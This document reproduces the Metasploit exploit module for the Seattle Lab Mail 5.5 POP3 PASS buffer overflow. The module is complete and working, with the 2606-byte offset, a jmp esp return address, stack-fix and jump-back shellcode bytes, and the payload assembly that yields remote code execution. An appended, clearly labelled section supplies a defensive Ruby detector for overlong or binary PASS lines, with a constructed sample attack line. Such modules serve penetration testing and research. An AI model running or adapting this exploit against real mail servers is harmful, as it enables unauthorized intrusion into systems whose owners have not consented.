GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/pop3/seattlelab_pass.rb
```ruby
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::Tcp

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Seattle Lab Mail 5.5 POP3 Buffer Overflow',
        'Description' => %q{
          There exists an unauthenticated buffer overflow vulnerability
          in the POP3 server of Seattle Lab Mail 5.5 when sending a password
          with excessive length.

          Successful exploitation should not crash either the
          service or the server; however, after initial use the
          port cannot be reused for successive exploitation until
          the service has been restarted. Consider using a command
          execution payload following the bind shell to restart
          the service if you need to reuse the same port.

          The overflow appears to occur in the debugging/error reporting
          section of the slmail.exe executable, and there are multiple
          offsets that will lead to successful exploitation. This exploit
          uses 2606, the offset that creates the smallest overall payload.
          The other offset is 4654.

          The return address is overwritten with a "jmp esp" call from the
          application library SLMFC.DLL found in %SYSTEM%\system32\. This
          return address works against all versions of Windows and service packs.

          The last modification date on the library is dated 06/02/99. Assuming
          that the code where the overflow occurs has not changed in some time,
          prior versions of SLMail may also be vulnerable with this exploit. The
          author has not been able to acquire older versions of SLMail for
          testing purposes. Please let us know if you were able to get this
          exploit working against other SLMail versions.
        },
        'Author' => 'stinko',
        'License' => MSF_LICENSE,
        'References' => [
          ['CVE', '2003-0264'],
          ['OSVDB', '11975'],
          ['BID', '7519'],
        ],
        'Privileged' => true,
        'DefaultOptions' => {
          'EXITFUNC' => 'thread',
        },
        'Payload' => {
          'Space' => 600,
          'BadChars' => "\x00\x0a\x0d\x20",
          'MinNops' => 100,
        },
        'Platform' => 'win',
        'Targets' => [
          ['Windows NT/2000/XP/2003 (SLMail 5.5)', { 'Ret' => 0x5f4a358f, 'Offset' => 2606 }]
        ],
        'DisclosureDate' => '2003-05-07',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        Opt::RPORT(110)
      ]
    )
  end

  def exploit
    connect

    print_status("Trying #{target.name} using jmp esp at #{"%.8x" % target.ret}")

    banner = sock.get_once || ''
    if banner !~ /^\+OK POP3 server (.*) ready/
      print_error("POP3 server does not appear to be running")
      return
    end

    sock.put("USER #{rand_text_alphanumeric(10)}\r\n")
    banner = sock.get_once
    if banner !~ /^\+OK (.*) welcome here/
      print_error("POP3 server rejected username")
      return
    end

    request = "PASS " + rand_text_alphanumeric(target['Offset'] - payload.encoded.length)
    request << payload.encoded
    request << [target.ret].pack('V')
    request << "\x81\xc4\xff\xef\xff\xff\x44" # fix the stack
    request << "\xe9\xcb\xfd\xff\xff" # go back 560 bytes
    request << rand_text_alphanumeric(512) # cruft
    request << "\r\n"

    sock.put(request)

    handler
    disconnect
  end
end
```
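The module's description identifies the trigger as a POP3 `PASS` command whose argument is far longer than any real password (the module pads it to the 2606-byte offset and then appends further bytes). The following is an added detection example, not part of the Metasploit module or the rapid7 code base: a small Ruby inspector that runs over client-side POP3 command lines and flags `USER`/`PASS` lines that exceed the RFC 1939 command-line limit or carry non-printable bytes in the credential field. The function names, the 255-byte threshold and the sample session are all constructed for this illustration; the threshold sits deliberately far below the offsets the module names so that the check does not depend on a particular build of the server.

```ruby
# Added example (not from the Metasploit module above): detection logic for
# the traffic pattern described in the module, an over-long or binary
# POP3 PASS argument. Function names and sample data are constructed.

# RFC 1939 limits a complete POP3 command line to 255 octets, so any
# credential line far beyond that is anomalous regardless of the exact
# offset a given server build needs.
MAX_COMMAND_LINE = 255

# Describes a single client command line. Input is the raw line including
# the trailing CRLF; it is treated as binary so raw bytes survive intact.
def inspect_pop3_command(raw_line)
  line = raw_line.b.chomp("\r\n")
  verb, _, argument = line.partition(' ')
  {
    verb: verb.upcase,
    argument_length: argument.bytesize,
    overlong: line.bytesize > MAX_COMMAND_LINE,
    # Bytes outside printable ASCII in a credential field are a strong hint
    # that the "password" is machine code rather than a passphrase.
    non_printable: argument.bytes.any? { |b| b < 0x20 || b > 0x7e }
  }
end

# Scans a whole client-side session (array of raw lines) and returns only
# the findings that merit an alert: overlong or binary USER/PASS lines.
def find_overflow_attempts(lines)
  lines.each_with_index.filter_map do |raw, idx|
    info = inspect_pop3_command(raw)
    next unless %w[USER PASS].include?(info[:verb])
    next unless info[:overlong] || info[:non_printable]
    info.merge(line_number: idx + 1)
  end
end

# Constructed sample session: a benign login, then a login attempt whose
# PASS argument is thousands of bytes long and contains raw bytes. The
# 2606-byte padding mirrors the offset stated in the module's description;
# the bytes after it are arbitrary filler chosen for the example.
SAMPLE_SESSION = [
  "USER alice\r\n".b,
  "PASS correct horse battery staple\r\n".b,
  "STAT\r\n".b,
  "USER bob\r\n".b,
  ("PASS " + ("A" * 2606) + [0x90, 0x90, 0xcc, 0xcc].pack('C*') + ("B" * 512) + "\r\n").b
]

if __FILE__ == $PROGRAM_NAME
  find_overflow_attempts(SAMPLE_SESSION).each do |f|
    puts format('line %<line_number>d: %<verb>s argument of %<argument_length>d bytes ' \
                '(overlong=%<overlong>s, non_printable=%<non_printable>s)', f)
  end
end
```

Run stand-alone it reports only line 5 of the constructed session. In practice the same two checks (length against the protocol limit, printability of the credential field) can be applied to any POP3 command capture; the benign `PASS` line with a long-but-normal passphrase does not trip either test.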